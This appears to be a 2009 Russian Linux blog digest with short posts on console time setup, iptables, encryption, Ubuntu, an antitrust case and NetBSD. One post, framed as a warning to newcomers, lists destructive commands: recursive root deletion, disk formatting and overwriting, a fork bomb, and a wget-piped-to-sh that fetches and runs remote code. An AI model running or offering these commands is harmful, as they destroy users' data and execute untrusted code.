Установка даты и времени в Linux

Как это делается при наличии Gnome или KDE знают все. Поэтому — консоль! Зачем? А вдруг у вас нету GUI(сервер, к примеру) или графическая оболочка снова сбоит…

Выбор часового пояса:
Идём в папку /usr/share/zoneinfo/, выбираем город, находящийся с нами в одном часовом поясе.
Теперь вместо /etc/localtime ставим символическую ссылку на /etc/localtime:
root[~]# ln -fs /usr/share/zoneinfo/Europe/Yekaterinburg /etc/localtime
Устанавливаем время и дату:
date ММДДЧЧммГГГГ.СС
Месяц, День, Час, Минуты, Год, Секунды.
root[~]# date 073008102009.59
Thu Jul 30 08:10:59 EDT 2009

Выполнять с правами root’а.

Коммунизм возвращается или что за шум вокруг GNU/Linux?

Автор: NeoGans
Ссылка на оригинал

«Все говорят, что мы вместе,
все говорят, но немногие знают — в каком…»

гр. Кино. В. Цой «Бошетунмай»

Пат, а спички?
— Тут ведь есть зажигалка! — пискнул мальчишка.
— Я от газа не прикуриваю!
Это опошление святой идеи Вечного Огня!
Прикуривать надо от спичек, блин!

Сергей Лукьяненко. Фальшивые зеркала

Нужен ли нам Линукс на десктоп? Судя по восторженным крикам некоторых, кто успел познакомиться с Пингвином лично, нужен. Другие, скептические настроенные товарищи, утверждают, что он нам не к чему, вполне достаточно и Windows XP или 98SE. И кому же из них верить? В восторженных криках первых заметны нотки революционно настроенных программистов, которые готовы волосы на голове вырвать, доказывая преимущества Open Source, а так же удобства использования Linux в качестве настольной системы для всех компьютеров. Те кто поверил им и по простоте душевной попробовал этот дистрибутив либо остался счастлив и в полку линуксоидов прибыло, либо, столкнувшись с первыми же трудностями, отказался от экспериментов и вернулся под крылышко Windows.

Читать далее

Блокировка нежелательных URL с помощью iptables

Иногда может возникнуть необходимость заблокировать доступ к некоторым сайтам, и внесение их адресов или даже подсетей в фаервол не приносит желаемых результатов, так как продуманные пользователи продолжают посещать их используя веб прокси количество которых так велико что о блокировке их не может быть и речи…. Есть конечно и явные минусы этого способа, но в моем случае минусы приниматься во внимание не стали. Из плюсов стоит отметить полную блокировку сайтов, они не будут работать даже через веб и обычные прокси сервера, с них не будет доставлятся почта и тд.

Читать далее

Продвинутый способ шифрования разделов в Linux

Постановка задачи
1. Шифрование разделов
1.1 Подготовим ядро Linux
1.2 Переходим к шифрованию
2. Загрузчик на usb флешке (grub)
2.1 Подготовим флешку
2.2 Переходим к загрузчику
2.3 Автоматизация монтирования шифрованных разделов при загрузке
2.4 Уничтожение загрузчика
2.5 Шифрование swap раздела
3. Паранойя
3.1. Ставим на флешку линукс (Gentoo)
3.2. Доводим дело до конца

Читать далее

Top 10 ошибок конфигурации *nix

10 самых распространенных ошибок конфигураций Linux и xBSD

Установить Linux/BSD не проблема, инсталлятор все сделает за нас, а вот правильно настроить систему, чтобы ее тут же успешно не атаковали хакеры, удается далеко не каждому. Проанализировав ситуацию, мыщъх отобрал десяток наиболее распространенных ошибок, допускаемых не только начинающими, но и матерыми юниксоидами.

Все видели логотип на главной странице OpenBSD? «Всего лишь две удаленных уязвимости в конфигурации по умолчанию за десять лет промышленной эксплуатации». Означает ли это, что, установив OpenBSD на свою машину, мы можем ничего не опасаться? Нет и еще раз нет!

Несмотря на то что в xBSD и особенно в Linux имеется достаточное количество дыр, под которые написано множество эксплойтов, большинство атак совершается не через них (хотя и через них тоже), а «благодаря» грубым ошибкам конфигурации, допущенным администратором. Это справедливо как для серверов, так и для рабочих станций, однако серверы имеют свою специфику: здесь доминируют дыры в PHP/Perl-скриптах, SQL-injecting и т.д. Об этом уже неоднократно говорилось на страницах нашего журнала, так что оставим серверы в покое (о них есть, кому позаботиться) и сосредоточимся на рабочих станциях обычных пользователей, которые обучаются методом тыка и совершенно незнакомы с тактикой ведения боя против хакеров.

Читать далее

«Cотня порезов от бумаги» в Ubuntu Linux

Разработчики популярного Linux-дистрибутива Ubuntu объявили о запуске инициативы One Hundred Paper Cuts («сотня порезов от бумаги»). Ее цель — собрать те мелочи, которые мешают пользователям удобно работать в системе, и, основываясь на этих данных, улучшить ощущения от использования Ubuntu Linux.
Как заявляется на странице «One Hundred Paper Cuts», этим «проектом руководит команда Canonical Design and User Experience с целью улучшения ощущений от использования Ubuntu за счет определения 100 небольших проблем, которые испытывают пользователи при работе с системой, и их устранения».
В качестве примеров таких проблем приводятся следующие: возможность задавать стандартное в системе имя файла печати в PDF вместо стандартного и «технического» «~/output.pdf»; улучшение работы переключения между рабочими пространствами через тачпад; увеличение ширины всплывающих уведомлений (notify-osd); упрощение терминологии в пунктах меню для извлечения компакт-дисков и других носителей (понятия «unmount» и «eject» затруднительны для неопытных пользователей).
Проект нацелен собрать 100 таких незначительных проблем в юзабилити системы и устранить их к грядущему релизу Ubuntu Linux 9.10, который состоится в октябре этого года.

Последние найденные и решённые проблемы: https://bugs.edge.launchpad.net/
Найденную тобой проблему можно запостить здесь: https://bugs.edge.launchpad.net/hundred … s/+filebug

7 смертоубийственных Linux-команд

Филиппинский студент Джан Ауза собрал список из 7 самых опасных команд в Linux. Внимание! Не надо испытывать эти команды на вашей рабочей системе — она будет полностью уничтожена. Пожалуйста, тренируйтесь в изолированных виртуальных средах.

Первая и самая известная команда: rm -rf /. Введенная от имени суперпользователя, рекурсивно удалит все файлы.

Намного быстрее форматирование: mkfs.ext3 /dev/sda. Эта команда уничтожит все файлы на диске /dev/sda.

Прием, известный как forkbomb (от системного вызова fork(), который ветвит текущий процесс). Достаточно набрать в консоли :( ){ :| :&};: и вся память заполнится копиями процессов, результатом чего будет зависание. Особо интересный эффект можно получить, поместив данную команду в сценарии загрузки.

Следующая команда портит жесткий диск /dev/sda: любая_команда > /dev/sda. Если вызванная команда выводит какие-либо данные, то они будут перенаправлены прямиком в начало диска, что приведет к потере данных.

Вредоносный код можно разместить в интернете и вызвать его удалённо командой, которая, на первый взгляд, не вызывает никаких подозрений: wget http://некоторый_вредоносный_код -O- | sh

Шестой способ вредительства заключается в том, чтобы отправить все файлы в «черную дыру» /dev/null. Сделать это можно следующим образом: mv /home/my_home_directory/* /dev/null

И последний способ, который делает невозможным восстановление утерянных данных:
dd if=/dev/urandom of=/dev/sda. В этом случае диск заполняется случайными данными.

Разумеется, опытный пользователь легко распознает любую вредоносную команду, а вот новичкам следует внимательно изучить примеры, чтобы не стать жертвой «дружеского» розыгрыша.

ФАС накажет производителей ПК за предустановленную Windows

Федеральная антимонопольная служба (ФАС) возбудила дело в отношении компаний Asus, Acer, HP, Toshiba, Samsung и Dell. Они обвиняются в нарушении закона о конкуренции. Дело будет рассмотрено 15 июля. Об этом сообщается в пресс-релизе ФАС.

Антимонопольщики установили, что 90 процентов ноутбуков Asus, Acer, HP, Toshiba, Samsung и Dell продаются в России с предустановленной операционной системой Windows. Но процедура возврата покупателям денег за отказ от этой ОС производителями не предусмотрена. Как следствие, зачастую покупатели не могут приобрести нужный ноутбук без предустановленной Windows.

Проверка в отношении Asus, Acer, HP, Toshiba, Samsung и Dell началась в феврале текущего года. В результате выяснилось, что документы, регламентирующие возврат денег за предустановленную на новый компьютер Windows, есть только у Asus, но и они вызвали у ФАС вопросы. Порядок возврата от компании Acer был представлен лишь в виде проекта с вводом в действие с первого мая 2009 года.

Партнерское соглашение Microsoft описывает процедуру возврата предустановленных на компьютеры программ корпорации. Также в соглашении предусмотрена компенсация партнерам Microsoft за возращенное ПО. Покупатель о возможности отказа от предустановленной ОС узнает при первом включении нового ноутбука.

Ubuntu в корпоративной среде.

llubun

С недавних пор начал писать проект по частичному переходу офиса на “Свободное программное обеспечение”. СПО должно быть не обязательно бесплатным. Заинтересованность в этом проекте была не столько у руководства, сколько у меня самого.

Для начала решил поставить Ubuntu, на те рабочие станции где пользователи были не особо нагружены и не выполняли основные бизнес процессы компании. Что бы основная работа этих людей была просиживание штанов в интернете и написание лёгких служебных записок.

Читать далее

У NetBSD появится пакетный менеджер

Emile Heitor написал в своем блоге о том, что работает над пакетным менеджером для NetBSD — pkgin. Новый пакетный менеджер будет аналогом apt и yum для управления бинарными пакетами pkgsrc. Для разрешения зависимостей будет использоваться pkg_summary(5).

pkgin пока нет в официальном дереве pkgsrc, но его можно найти в pkgsrc-wip.

Ссылка на блог разработчика

отправлено на форум пользователем heam